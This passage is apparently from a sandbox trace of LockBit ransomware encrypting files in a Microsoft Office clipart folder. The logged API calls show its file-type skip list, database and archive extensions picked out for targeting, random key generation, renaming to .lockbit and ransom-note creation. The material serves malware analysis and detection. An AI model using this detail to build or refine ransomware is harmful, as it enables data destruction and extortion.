dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.516] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.516] malloc (_Size=0x40068) returned 0x3df0008 [0161.516] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=124982) returned 1 [0161.516] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.517] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.517] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.522] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400003.PNG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400003.PNG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.522] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.522] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.526] free (_Block=0x1fa2ed8) [0161.526] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400003.PNG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.527] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.527] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.527] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39f2bd00, ftCreationTime.dwHighDateTime=0x1c98cd2, ftLastAccessTime.dwLowDateTime=0x66220ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x39f2bd00, ftLastWriteTime.dwHighDateTime=0x1c98cd2, nFileSizeHigh=0x0, nFileSizeLow=0x19a5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0400004.PNG", cAlternateFileName="")) returned 1 [0161.527] lstrcmpiW (lpString1=".", lpString2="J0400004.PNG") returned -1 [0161.527] lstrcmpiW (lpString1="..", lpString2="J0400004.PNG") returned -1 [0161.527] PathFindExtensionW (pszPath="J0400004.PNG") returned=".PNG" [0161.527] lstrcmpiW (lpString1=".386", lpString2=".PNG") returned -1 [0161.527] lstrcmpiW (lpString1=".cmd", lpString2=".PNG") returned -1 [0161.527] lstrcmpiW (lpString1=".exe", lpString2=".PNG") returned -1 [0161.527] lstrcmpiW (lpString1=".ani", lpString2=".PNG") returned -1 [0161.527] lstrcmpiW (lpString1=".adv", lpString2=".PNG") returned -1 [0161.527] lstrcmpiW (lpString1=".theme", lpString2=".PNG") returned 1 [0161.527] lstrcmpiW (lpString1=".msi", lpString2=".PNG") returned -1 [0161.527] lstrcmpiW (lpString1=".msp", lpString2=".PNG") returned -1 [0161.527] lstrcmpiW (lpString1=".com", lpString2=".PNG") returned -1 [0161.527] lstrcmpiW (lpString1=".diagpkg", lpString2=".PNG") returned -1 [0161.527] lstrcmpiW (lpString1=".nls", lpString2=".PNG") returned -1 [0161.527] lstrcmpiW (lpString1=".diagcab", lpString2=".PNG") returned -1 [0161.527] lstrcmpiW (lpString1=".lock", lpString2=".PNG") returned -1 [0161.527] lstrcmpiW (lpString1=".ocx", lpString2=".PNG") returned -1 [0161.527] lstrcmpiW (lpString1=".mpa", lpString2=".PNG") returned -1 [0161.527] lstrcmpiW (lpString1=".cpl", lpString2=".PNG") returned -1 [0161.527] lstrcmpiW (lpString1=".mod", lpString2=".PNG") returned -1 [0161.528] lstrcmpiW (lpString1=".hta", lpString2=".PNG") returned -1 [0161.528] lstrcmpiW (lpString1=".icns", lpString2=".PNG") returned -1 [0161.528] lstrcmpiW (lpString1=".prf", lpString2=".PNG") returned 1 [0161.528] lstrcmpiW (lpString1=".rtp", lpString2=".PNG") returned 1 [0161.528] lstrcmpiW (lpString1=".diagcfg", lpString2=".PNG") returned -1 [0161.528] lstrcmpiW (lpString1=".msstyles", lpString2=".PNG") returned -1 [0161.528] lstrcmpiW (lpString1=".bin", lpString2=".PNG") returned -1 [0161.528] lstrcmpiW (lpString1=".hlp", lpString2=".PNG") returned -1 [0161.528] lstrcmpiW (lpString1=".shs", lpString2=".PNG") returned 1 [0161.528] lstrcmpiW (lpString1=".drv", lpString2=".PNG") returned -1 [0161.528] lstrcmpiW (lpString1=".wpx", lpString2=".PNG") returned 1 [0161.528] lstrcmpiW (lpString1=".bat", lpString2=".PNG") returned -1 [0161.528] lstrcmpiW (lpString1=".rom", lpString2=".PNG") returned 1 [0161.528] lstrcmpiW (lpString1=".msc", lpString2=".PNG") returned -1 [0161.528] lstrcmpiW (lpString1=".spl", lpString2=".PNG") returned 1 [0161.528] lstrcmpiW (lpString1=".ps1", lpString2=".PNG") returned 1 [0161.528] lstrcmpiW (lpString1=".msu", lpString2=".PNG") returned -1 [0161.528] lstrcmpiW (lpString1=".ics", lpString2=".PNG") returned -1 [0161.528] lstrcmpiW (lpString1=".key", lpString2=".PNG") returned -1 [0161.528] lstrcmpiW (lpString1=".mp3", lpString2=".PNG") returned -1 [0161.528] lstrcmpiW (lpString1=".reg", lpString2=".PNG") returned 1 [0161.528] lstrcmpiW (lpString1=".dll", lpString2=".PNG") returned -1 [0161.528] lstrcmpiW (lpString1=".ini", lpString2=".PNG") returned -1 [0161.528] lstrcmpiW (lpString1=".idx", lpString2=".PNG") returned -1 [0161.528] lstrcmpiW (lpString1=".sys", lpString2=".PNG") returned 1 [0161.529] lstrcmpiW (lpString1=".hlp", lpString2=".PNG") returned -1 [0161.529] lstrcmpiW (lpString1=".ico", lpString2=".PNG") returned -1 [0161.529] lstrcmpiW (lpString1=".lnk", lpString2=".PNG") returned -1 [0161.529] lstrcmpiW (lpString1=".rdp", lpString2=".PNG") returned 1 [0161.529] lstrcmpiW (lpString1=".lockbit", lpString2=".PNG") returned -1 [0161.529] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0400004.PNG") returned 1 [0161.529] lstrcmpiW (lpString1="ntldr", lpString2="J0400004.PNG") returned 1 [0161.529] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0400004.PNG") returned 1 [0161.529] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0400004.PNG") returned -1 [0161.529] lstrcmpiW (lpString1="autorun.inf", lpString2="J0400004.PNG") returned -1 [0161.529] lstrcmpiW (lpString1="thumbs.db", lpString2="J0400004.PNG") returned 1 [0161.529] lstrcmpiW (lpString1="iconcache.db", lpString2="J0400004.PNG") returned -1 [0161.529] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.529] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400004.PNG") returned=".PNG" [0161.529] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0161.529] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0161.529] lstrcmpiW (lpString1=".7z", lpString2=".PNG") returned -1 [0161.529] lstrcmpiW (lpString1=".ckp", lpString2=".PNG") returned -1 [0161.529] lstrcmpiW (lpString1=".dacpac", lpString2=".PNG") returned -1 [0161.529] lstrcmpiW (lpString1=".db", lpString2=".PNG") returned -1 [0161.529] lstrcmpiW (lpString1=".db-shm", lpString2=".PNG") returned -1 [0161.529] lstrcmpiW (lpString1=".db-wal", lpString2=".PNG") returned -1 [0161.529] lstrcmpiW (lpString1=".db3", lpString2=".PNG") returned -1 [0161.529] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0161.529] lstrcmpiW (lpString1=".dbc", lpString2=".PNG") returned -1 [0161.529] lstrcmpiW (lpString1=".dbs", lpString2=".PNG") returned -1 [0161.529] lstrcmpiW (lpString1=".dbt", lpString2=".PNG") returned -1 [0161.530] lstrcmpiW (lpString1=".dbv", lpString2=".PNG") returned -1 [0161.530] lstrcmpiW (lpString1=".frm", lpString2=".PNG") returned -1 [0161.530] lstrcmpiW (lpString1=".mdf", lpString2=".PNG") returned -1 [0161.530] lstrcmpiW (lpString1=".mrg", lpString2=".PNG") returned -1 [0161.530] lstrcmpiW (lpString1=".mwb", lpString2=".PNG") returned -1 [0161.530] lstrcmpiW (lpString1=".myd", lpString2=".PNG") returned -1 [0161.530] lstrcmpiW (lpString1=".ndf", lpString2=".PNG") returned -1 [0161.530] lstrcmpiW (lpString1=".qry", lpString2=".PNG") returned 1 [0161.530] lstrcmpiW (lpString1=".sdb", lpString2=".PNG") returned 1 [0161.530] lstrcmpiW (lpString1=".sdf", lpString2=".PNG") returned 1 [0161.530] lstrcmpiW (lpString1=".sql", lpString2=".PNG") returned 1 [0161.530] lstrcmpiW (lpString1=".sqlite", lpString2=".PNG") returned 1 [0161.530] lstrcmpiW (lpString1=".sqlite3", lpString2=".PNG") returned 1 [0161.530] lstrcmpiW (lpString1=".sqlitedb", lpString2=".PNG") returned 1 [0161.530] lstrcmpiW (lpString1=".tmd", lpString2=".PNG") returned 1 [0161.530] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400004.PNG.lockbit") returned 72 [0161.530] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400004.PNG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400004.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.531] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.531] malloc (_Size=0x40068) returned 0x3df0008 [0161.531] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=105053) returned 1 [0161.531] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.532] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.532] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.533] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.533] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.538] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400004.PNG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400004.PNG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.538] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.538] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.542] free (_Block=0x1fa2ed8) [0161.542] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400004.PNG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.542] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.542] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.542] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82aa7600, ftCreationTime.dwHighDateTime=0x1c98cd2, ftLastAccessTime.dwLowDateTime=0x66220ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x82aa7600, ftLastWriteTime.dwHighDateTime=0x1c98cd2, nFileSizeHigh=0x0, nFileSizeLow=0x17742, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0400005.PNG", cAlternateFileName="")) returned 1 [0161.542] lstrcmpiW (lpString1=".", lpString2="J0400005.PNG") returned -1 [0161.542] lstrcmpiW (lpString1="..", lpString2="J0400005.PNG") returned -1 [0161.542] PathFindExtensionW (pszPath="J0400005.PNG") returned=".PNG" [0161.542] lstrcmpiW (lpString1=".386", lpString2=".PNG") returned -1 [0161.542] lstrcmpiW (lpString1=".cmd", lpString2=".PNG") returned -1 [0161.542] lstrcmpiW (lpString1=".exe", lpString2=".PNG") returned -1 [0161.542] lstrcmpiW (lpString1=".ani", lpString2=".PNG") returned -1 [0161.542] lstrcmpiW (lpString1=".adv", lpString2=".PNG") returned -1 [0161.542] lstrcmpiW (lpString1=".theme", lpString2=".PNG") returned 1 [0161.542] lstrcmpiW (lpString1=".msi", lpString2=".PNG") returned -1 [0161.542] lstrcmpiW (lpString1=".msp", lpString2=".PNG") returned -1 [0161.542] lstrcmpiW (lpString1=".com", lpString2=".PNG") returned -1 [0161.542] lstrcmpiW (lpString1=".diagpkg", lpString2=".PNG") returned -1 [0161.542] lstrcmpiW (lpString1=".nls", lpString2=".PNG") returned -1 [0161.542] lstrcmpiW (lpString1=".diagcab", lpString2=".PNG") returned -1 [0161.542] lstrcmpiW (lpString1=".lock", lpString2=".PNG") returned -1 [0161.542] lstrcmpiW (lpString1=".ocx", lpString2=".PNG") returned -1 [0161.543] lstrcmpiW (lpString1=".mpa", lpString2=".PNG") returned -1 [0161.543] lstrcmpiW (lpString1=".cpl", lpString2=".PNG") returned -1 [0161.543] lstrcmpiW (lpString1=".mod", lpString2=".PNG") returned -1 [0161.543] lstrcmpiW (lpString1=".hta", lpString2=".PNG") returned -1 [0161.543] lstrcmpiW (lpString1=".icns", lpString2=".PNG") returned -1 [0161.543] lstrcmpiW (lpString1=".prf", lpString2=".PNG") returned 1 [0161.543] lstrcmpiW (lpString1=".rtp", lpString2=".PNG") returned 1 [0161.543] lstrcmpiW (lpString1=".diagcfg", lpString2=".PNG") returned -1 [0161.543] lstrcmpiW (lpString1=".msstyles", lpString2=".PNG") returned -1 [0161.543] lstrcmpiW (lpString1=".bin", lpString2=".PNG") returned -1 [0161.543] lstrcmpiW (lpString1=".hlp", lpString2=".PNG") returned -1 [0161.543] lstrcmpiW (lpString1=".shs", lpString2=".PNG") returned 1 [0161.543] lstrcmpiW (lpString1=".drv", lpString2=".PNG") returned -1 [0161.543] lstrcmpiW (lpString1=".wpx", lpString2=".PNG") returned 1 [0161.543] lstrcmpiW (lpString1=".bat", lpString2=".PNG") returned -1 [0161.543] lstrcmpiW (lpString1=".rom", lpString2=".PNG") returned 1 [0161.543] lstrcmpiW (lpString1=".msc", lpString2=".PNG") returned -1 [0161.543] lstrcmpiW (lpString1=".spl", lpString2=".PNG") returned 1 [0161.543] lstrcmpiW (lpString1=".ps1", lpString2=".PNG") returned 1 [0161.543] lstrcmpiW (lpString1=".msu", lpString2=".PNG") returned -1 [0161.543] lstrcmpiW (lpString1=".ics", lpString2=".PNG") returned -1 [0161.543] lstrcmpiW (lpString1=".key", lpString2=".PNG") returned -1 [0161.543] lstrcmpiW (lpString1=".mp3", lpString2=".PNG") returned -1 [0161.543] lstrcmpiW (lpString1=".reg", lpString2=".PNG") returned 1 [0161.543] lstrcmpiW (lpString1=".dll", lpString2=".PNG") returned -1 [0161.543] lstrcmpiW (lpString1=".ini", lpString2=".PNG") returned -1 [0161.543] lstrcmpiW (lpString1=".idx", lpString2=".PNG") returned -1 [0161.544] lstrcmpiW (lpString1=".sys", lpString2=".PNG") returned 1 [0161.544] lstrcmpiW (lpString1=".hlp", lpString2=".PNG") returned -1 [0161.544] lstrcmpiW (lpString1=".ico", lpString2=".PNG") returned -1 [0161.544] lstrcmpiW (lpString1=".lnk", lpString2=".PNG") returned -1 [0161.544] lstrcmpiW (lpString1=".rdp", lpString2=".PNG") returned 1 [0161.544] lstrcmpiW (lpString1=".lockbit", lpString2=".PNG") returned -1 [0161.544] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0400005.PNG") returned 1 [0161.544] lstrcmpiW (lpString1="ntldr", lpString2="J0400005.PNG") returned 1 [0161.544] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0400005.PNG") returned 1 [0161.544] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0400005.PNG") returned -1 [0161.544] lstrcmpiW (lpString1="autorun.inf", lpString2="J0400005.PNG") returned -1 [0161.544] lstrcmpiW (lpString1="thumbs.db", lpString2="J0400005.PNG") returned 1 [0161.544] lstrcmpiW (lpString1="iconcache.db", lpString2="J0400005.PNG") returned -1 [0161.544] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.544] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400005.PNG") returned=".PNG" [0161.544] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0161.544] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0161.544] lstrcmpiW (lpString1=".7z", lpString2=".PNG") returned -1 [0161.544] lstrcmpiW (lpString1=".ckp", lpString2=".PNG") returned -1 [0161.544] lstrcmpiW (lpString1=".dacpac", lpString2=".PNG") returned -1 [0161.544] lstrcmpiW (lpString1=".db", lpString2=".PNG") returned -1 [0161.544] lstrcmpiW (lpString1=".db-shm", lpString2=".PNG") returned -1 [0161.544] lstrcmpiW (lpString1=".db-wal", lpString2=".PNG") returned -1 [0161.544] lstrcmpiW (lpString1=".db3", lpString2=".PNG") returned -1 [0161.544] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0161.544] lstrcmpiW (lpString1=".dbc", lpString2=".PNG") returned -1 [0161.545] lstrcmpiW (lpString1=".dbs", lpString2=".PNG") returned -1 [0161.545] lstrcmpiW (lpString1=".dbt", lpString2=".PNG") returned -1 [0161.545] lstrcmpiW (lpString1=".dbv", lpString2=".PNG") returned -1 [0161.545] lstrcmpiW (lpString1=".frm", lpString2=".PNG") returned -1 [0161.545] lstrcmpiW (lpString1=".mdf", lpString2=".PNG") returned -1 [0161.545] lstrcmpiW (lpString1=".mrg", lpString2=".PNG") returned -1 [0161.545] lstrcmpiW (lpString1=".mwb", lpString2=".PNG") returned -1 [0161.545] lstrcmpiW (lpString1=".myd", lpString2=".PNG") returned -1 [0161.545] lstrcmpiW (lpString1=".ndf", lpString2=".PNG") returned -1 [0161.545] lstrcmpiW (lpString1=".qry", lpString2=".PNG") returned 1 [0161.545] lstrcmpiW (lpString1=".sdb", lpString2=".PNG") returned 1 [0161.545] lstrcmpiW (lpString1=".sdf", lpString2=".PNG") returned 1 [0161.545] lstrcmpiW (lpString1=".sql", lpString2=".PNG") returned 1 [0161.545] lstrcmpiW (lpString1=".sqlite", lpString2=".PNG") returned 1 [0161.545] lstrcmpiW (lpString1=".sqlite3", lpString2=".PNG") returned 1 [0161.545] lstrcmpiW (lpString1=".sqlitedb", lpString2=".PNG") returned 1 [0161.545] lstrcmpiW (lpString1=".tmd", lpString2=".PNG") returned 1 [0161.545] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400005.PNG.lockbit") returned 72 [0161.545] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400005.PNG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400005.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.547] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.547] malloc (_Size=0x40068) returned 0x3df0008 [0161.547] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=96066) returned 1 [0161.547] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.548] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.548] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.548] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.548] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.553] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400005.PNG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400005.PNG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.553] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.553] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.557] free (_Block=0x1fa2ed8) [0161.557] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400005.PNG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.558] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.558] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.558] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x567be5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x2645, dwReserved0=0x0, dwReserved1=0x0, cFileName="JAVA_01.MID", cAlternateFileName="")) returned 1 [0161.558] lstrcmpiW (lpString1=".", lpString2="JAVA_01.MID") returned -1 [0161.558] lstrcmpiW (lpString1="..", lpString2="JAVA_01.MID") returned -1 [0161.558] PathFindExtensionW (pszPath="JAVA_01.MID") returned=".MID" [0161.558] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0161.558] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0161.558] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0161.558] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0161.558] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0161.558] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0161.558] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0161.558] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0161.558] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0161.558] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0161.558] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0161.558] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0161.558] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0161.558] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0161.558] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0161.558] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0161.558] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0161.558] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0161.559] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0161.559] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0161.559] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0161.559] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0161.559] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0161.559] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0161.559] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0161.559] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0161.559] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0161.559] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0161.559] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0161.559] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0161.559] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0161.559] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0161.559] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0161.559] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0161.559] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0161.559] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0161.559] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0161.559] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0161.559] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0161.559] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0161.559] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0161.559] 